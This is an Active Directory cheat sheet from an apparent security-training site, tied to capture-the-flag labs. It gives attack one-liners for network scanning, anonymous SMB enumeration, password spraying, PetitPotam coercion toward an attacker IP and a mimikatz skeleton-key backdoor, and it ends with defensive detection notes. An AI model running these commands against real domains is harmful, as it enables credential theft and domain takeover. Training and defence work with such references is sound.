search

windowsActive Directory Cheat Sheet for 2025 | Cyber Codex

Active Directory is the spine of enterprise networks — break it, and the whole body collapses.

Welcome to your 2025-ready Active Directory (AD) cheat sheet — a masterkey reference combining offensive, defensive, and investigative commands. Whether you’re mapping domain forests as a red teamer or auditing misconfigs as a blue team analyst, this cheat sheet turns your recon into results.

This isn’t just theory — each section below is inspired by real-world labs and CTFs like TryHackMe’s Attacking AD, Ignite, Wreath, and HackTheBox’s Labs (free tier).

hashtag
Scan Network & Initial Enumeration

Think of this like taking a flashlight into a dark room — you’re identifying where the machines live and how they talk.

hashtag
Lab Used: TryHackMe — Ignite (Free)

  • nmap -sP <target_range> — Sweep the subnet for life.

  • nmap -PN -sV --top-ports 50 --open <target_ip> — Fingerprint the top talkers.

  • nmap -PN --script smb-vuln* -p139,445 <target_ip> — Check SMB doors for rusty locks.

  • cme smb <target_range> — CrackMapExec meets Samba: Discover shares, users, and more.

hashtag
Active Directory Discovery

Real-World Feel: Like sneaking into a library and figuring out the floor plan before grabbing the rare books.

Lab Used: TryHackMe — Attacking AD

  • nslookup -type=SRV _ldap._tcp.dc._msdcs.DOMAIN.LOCAL — Sniff out Domain Controllers.

  • dig axfr @dns_server domain.local — (If misconfigured) grab every DNS record.

  • enum4linux -a -u "" -p "" <target_ip> — Anonymous recon.

  • smbmap -u "guest" -p "" -P 445 -H <target_ip> — Test for open access.

Try This in Wreath: Compare anonymous SMB access vs. guest login.

hashtag
Gaining Foothold: Attacks That Work

This is your beachhead. You’re not deep yet — but you’ve got a toe in the door.

hashtag
Password Spraying

  • cme smb -u user.txt -p password.txt <target_ip>→ Blanket login attempts with caution.

hashtag
AS-REP Roasting

  • Demo This: TryHackMe — Wreath, where one user lacks pre-auth and leaks hashes.

hashtag
LLMNR Poisoning + Relays

hashtag
PetitPotam NTLM Coercion

  • PetitPotam.py -d DOMAIN.LOCAL <attacker_ip> <target_ip> — Weaponized forced auth.

hashtag
Post-Exploitation & Lateral Movement

This is where it gets cinematic. You’ve got creds. Now you walk the domain.

Real-Lab Example: HackTheBox — Offshore (Free) has this exact flow with SMB shares, BloodHound ops, and user hops.

hashtag
BloodHound Collection

hashtag
Enumerate Shares

hashtag
Kerberoasting

hashtag
Pass-the-Hash / Key

hashtag
Domain Dominance

Endgame begins. You now own one machine. Time to own the forest.

hashtag
Credential Dumping

hashtag
Golden Ticket

hashtag
Skeleton Key

mimikatz "privilege::debug" "misc::skeleton" — One key to rule them all.

hashtag
Blue Team & Detection Notes

Defend like a hunter. Here’s what defenders should be doing.

  • Monitor PowerShell logs: Sysmon + WinLogBeat + Elastic.

  • Detect responder/LLMNR poisoning with: Invoke-DetectResponder.ps1

  • Enable SMB signing to nullify NTLM relays.

  • Set Audit Directory Services Changes for object manipulation.

  • Rotate krbtgt password twice after compromise.

TryHackMe — Security Analyst Path offers hands-on SIEM and GPO audit labs.

hashtag
Hash Cracking Cheat Codes

hashtag
Bonus: Custom Tools & Power Scripts

  • PowerView.ps1 – Swiss army knife for AD enum.

  • SharpHound.exe – Native collector for BloodHound.

  • Invoke-Kerberoast, Invoke-UserHunter, Get-GPPPassword – Part of PowerSploit.

  • adidnsdump – Digs through DNS for fun and creds.

hashtag
Final Note

This isn’t a cheat sheet — it’s a tactical guide. Pair these commands with real labs, reflect on each step, and don’t memorize — internalize.

“The more silently you move in AD, the louder your skills speak.”

PreviousFrom Boot to Root: My HackTheBox Journey (2022–2025) | Cyber CodexNextThe Art of Breaking OAuth: Real-World Exploit and Misuses | Cyber Codex

Last updated

Was this helpful?